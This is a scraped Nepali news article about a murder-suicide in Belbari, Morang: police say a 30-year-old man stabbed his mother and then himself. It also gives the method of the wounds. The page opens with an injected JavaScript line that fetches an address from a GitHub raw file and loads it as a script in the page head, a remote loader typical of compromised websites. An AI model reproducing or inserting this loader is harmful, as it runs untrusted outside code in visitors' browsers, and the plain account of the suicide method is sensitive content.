;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
मोरङ — बेलबारी नगरपालिका-४ बुधबारेमा बिहीबार एक युवाले आमालाई हत्या गरी आफूपनि आत्महत्या गरेका छन् । स्थानीय ३० वर्षीय जीवनबहादुर लिम्बूले आमा ५५ वर्षीया देवीकुमारीलाई हत्या गरी आत्महत्या गरेको प्रहरी उपरीक्षक विश्व अधिकारीले बताए ।
जीवनले देवीकुमारीको टाउको र निधारमा छुरी प्रहार गरेपछि उक्त छुरीले नै आफ्नो घाँटी र पेटमा प्रहार गरेको प्रहरी उपरीक्षक अधिकारीले बताए । घाइते जीवनको सामुदायिक अस्पताल बेलबारीमा उपचारको क्रममा मृत्यु भएको मोरङ प्रहरीले जनाएको छ ।
घट्नाको कारण खुल्न नसकेको र इलाका प्रहरी कार्यालय बेलबारीको प्रमुख प्रहरी निरीक्षकको नेतृत्वमा खटिएको छानबिन टोली घटनास्थल पुगेर छानबिन गरिरहेको एसपी अधिकारीले बताए ।
फेसबुक प्रतिक्रियाहरु